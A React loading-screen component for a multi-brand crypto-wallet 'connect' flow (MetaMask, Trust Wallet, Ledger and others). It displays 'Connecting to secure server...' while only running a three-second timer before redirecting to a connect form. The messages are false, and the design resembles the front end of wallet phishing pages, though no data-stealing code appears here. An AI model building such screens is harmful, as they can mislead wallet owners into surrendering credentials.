// src/components/Loading/LoadingScreen.js
import React, { useEffect, useMemo } from 'react';
import { motion } from 'framer-motion';
import { useNavigate, useLocation, useParams } from 'react-router-dom';

const LoadingScreen = () => {
  const navigate = useNavigate();
  const location = useLocation();
  const { wallet: walletParam } = useParams();
  
  // Helper to format wallet name from URL param (matches ConnectForm logic)
  const formatWalletNameFromParam = (param) => {
    if (!param) return 'Wallet';
    const specialCases = {
      'walletconnect': 'WalletConnect',
      'trust': 'Trust Wallet',
      'trust-wallet': 'Trust Wallet',
      'metamask': 'MetaMask',
      'coinbase': 'Coinbase',
      'binance': 'Binance',
      'exodus': 'Exodus',
      'ledger': 'Ledger',
      'phantom': 'Phantom',
      'okx': 'OKX',
      'okto': 'OKTO',
      'okse': 'OKSE',
      'mew': 'MEW',
    };
    const lower = param.toLowerCase();
    if (specialCases[lower]) {
      return specialCases[lower];
    }
    return param
      .split('-')
      .map(word => word.charAt(0).toUpperCase() + word.slice(1).toLowerCase())
      .join(' ');
  };

  // Memoize wallet object to prevent recreating on every render
  const wallet = useMemo(() => {
    return location.state?.wallet || {
      name: formatWalletNameFromParam(walletParam),
      icon: null
    };
  }, [location.state?.wallet, walletParam]);

  useEffect(() => {
    const timer = setTimeout(() => {
      navigate(`/connect/${walletParam}/form`, { 
        state: { wallet },
        replace: true 
      });
    }, 3000); // 3 seconds timer

    return () => clearTimeout(timer);
  }, [navigate, wallet, walletParam]);

  return (
    <motion.div
      initial={{ opacity: 0 }}
      animate={{ opacity: 1 }}
      exit={{ opacity: 0 }}
      className="min-h-screen bg-gradient-to-br from-[#0b0818] via-[#1a1229] to-[#0b0818] flex items-center justify-center p-4"
    >
      <div className="text-center max-w-md mx-auto px-4">
        <motion.div
          initial={{ scale: 0.5, opacity: 0 }}
          animate={{ scale: 1, opacity: 1 }}
          transition={{ duration: 0.5 }}
          className="mb-8"
        >
          {wallet.icon ? (
            <img 
              src={wallet.icon} 
              alt={`${wallet.name} logo`}
              className="w-24 h-24 mx-auto mb-4 object-contain"
            />
          ) : (
            <span className="text-6xl mb-4 block">💼</span>
          )}
          <h2 className="text-2xl font-bold bg-gradient-to-r from-[#7c3aed] via-[#c084fc] to-[#a855f7] bg-clip-text text-transparent">
            Initializing {wallet.name}
          </h2>
        </motion.div>
        
        <motion.div
          initial={{ y: 20, opacity: 0 }}
          animate={{ y: 0, opacity: 1 }}
          transition={{ delay: 0.2 }}
          className="text-gray-300 mb-8"
        >
          <p className="mb-2">Connecting to secure server...</p>
          <div className="flex justify-center space-x-2">
            <motion.div
              animate={{
                scale: [1, 1.2, 1],
                opacity: [0.5, 1, 0.5]
              }}
              transition={{
                duration: 1,
                repeat: Infinity,
                repeatType: "loop"
              }}
              className="w-3 h-3 bg-[#7c3aed] rounded-full"
            />
            <motion.div
              animate={{
                scale: [1, 1.2, 1],
                opacity: [0.5, 1, 0.5]
              }}
              transition={{
                duration: 1,
                delay: 0.2,
                repeat: Infinity,
                repeatType: "loop"
              }}
              className="w-3 h-3 bg-[#7c3aed] rounded-full"
            />
            <motion.div
              animate={{
                scale: [1, 1.2, 1],
                opacity: [0.5, 1, 0.5]
              }}
              transition={{
                duration: 1,
                delay: 0.4,
                repeat: Infinity,
                repeatType: "loop"
              }}
              className="w-3 h-3 bg-[#7c3aed] rounded-full"
            />
          </div>
        </motion.div>

        <motion.div
          initial={{ opacity: 0 }}
          animate={{ opacity: 1 }}
          transition={{ delay: 0.4 }}
          className="text-sm text-gray-400"
        >
          Please wait while we establish a secure connection...
        </motion.div>
      </div>
    </motion.div>
  );
};

export default LoadingScreen;